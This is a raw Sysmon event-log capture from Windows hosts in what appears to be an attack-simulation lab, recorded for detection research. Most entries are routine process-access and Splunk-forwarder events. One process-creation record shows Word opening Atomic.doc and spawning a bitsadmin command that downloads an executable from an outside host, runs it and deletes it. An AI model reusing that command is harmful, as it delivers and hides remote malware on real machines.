12:25:41.287{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293230Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.287{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293229Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.287{BEA10069-D4AB-6086-4301-00000000BB01}33842096C:\Windows\system32\csrss.exe{BEA10069-02C5-6088-232A-00000000BB01}6764C:\Windows\SYSTEM32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000293228Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.287{BEA10069-02A1-6088-112A-00000000BB01}65686164C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-02C5-6088-232A-00000000BB01}6764C:\Windows\SYSTEM32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+43ae7|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+4358a|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+44642|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3c560|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3d357|C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL+100e92|UNKNOWN(00000145103363F2) 154100x8000000000000000293227Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.290{BEA10069-02C5-6088-232A-00000000BB01}6764C:\Windows\System32\bitsadmin.exe7.8.14393.0 (rs1_release.160715-1616)BITS administration utilityMicrosoft® Windows® Operating SystemMicrosoft Corporationbitsadmin.exebitsadmin /transfer 70d1 http://vibing.catjamfest.com:8080/b %%APPDATA%%\70d1.exe&%%APPDATA%%\70d1.exe&del %%APPDATA%%\70d1.exeC:\Users\Administrator\Downloads\WIN-HOST-96\Administrator{BEA10069-D4AE-6086-06A6-0F0000000000}0xfa6062HighMD5=F548717B821860C2B2242367732FE105,SHA256=E1057A20945BCE8F00C0BE5E3DB40C4A98AB33F42F4D2DF919AEDB0EF6651D6E,IMPHASH=CE0EB5030AA7D3C8606F11BBCA0BC912{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Administrator\Downloads\Atomic.doc" /o "" 10341000x8000000000000000293226Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.287{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293225Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:41.187{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1C992F1E16F3AD5C5920DA48DEF393B,SHA256=80E96E9098830DB31950EB41146D228DFF3E2E7CFA333163BE04E69E48CC9FA6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441532Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:42.268{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441531Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:42.268{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441530Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:42.086{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EE14102D0E15E6EC9713B2D29EFF082,SHA256=1A9A7BCDA55881E8F5F4DB204610EDB3258DE03A7B9D2438B2D441C04D8E69D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293257Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:42.771{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293256Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:42.302{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7AFFB04CD4C22DC627C1D04F2A516C8E,SHA256=5D69B04D223150A51DD1CEFADAF54D4E1E2112FF3954B8DBAEB38027021CDE93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293255Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:42.302{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=000C0DA313F79C1CB986F87DB9C86026,SHA256=C6802DC3F1FF64E17E713DB03622F58EBFF51F6C94BB3DE8BA2F165A53DBF4BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293254Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:42.087{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293259Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:43.571{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92F9F192DC390AB2096C5DF5BFBA690B,SHA256=4AE941180150ABB4709E960B763EFA1631B9244AC90AB18001EB59A6731838FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293258Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:43.318{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=666ECD24EC4E880142FBFEC369645E52,SHA256=72DC550B8CB8E5F3869278EA185F3BB0927013A7937374EE4B5A48C788AB15CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441537Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:41.031{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal54901- 23542300x8000000000000000441536Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:43.591{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04ABC85386E41F1189699DAA6F6D8846,SHA256=82414DF20E7C747232E9A8CDF72125F504EA39FAD0CC9F2522CFBB8420E5CFC6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441535Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:43.269{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441534Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:43.269{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441533Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:43.110{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B144DC19E3E40FDACE7AE7DC539F360,SHA256=EAAB3E18652E0273305801F572AEBD3E1CEA355216D43553D6041E8E5BA78138,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293289Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.571{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293288Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.571{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293287Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.571{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293286Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.571{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-02C8-6088-252A-00000000BB01}5412C:\Windows\SYSTEM32\bitsadmin.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293285Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.571{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02C8-6088-252A-00000000BB01}5412C:\Windows\SYSTEM32\bitsadmin.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293284Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.555{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02C8-6088-252A-00000000BB01}5412C:\Windows\SYSTEM32\bitsadmin.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293283Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.555{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02C8-6088-252A-00000000BB01}5412C:\Windows\SYSTEM32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293282Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.555{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02C8-6088-252A-00000000BB01}5412C:\Windows\SYSTEM32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293281Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.555{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02C8-6088-252A-00000000BB01}5412C:\Windows\SYSTEM32\bitsadmin.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293280Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.555{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02C8-6088-252A-00000000BB01}5412C:\Windows\SYSTEM32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293279Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.555{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02C8-6088-252A-00000000BB01}5412C:\Windows\SYSTEM32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293278Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.555{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02C8-6088-252A-00000000BB01}5412C:\Windows\SYSTEM32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293277Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.555{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02C8-6088-262A-00000000BB01}4408C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293276Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:44.555{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02C8-6088-262A-00000000BB01}4408C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293275Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 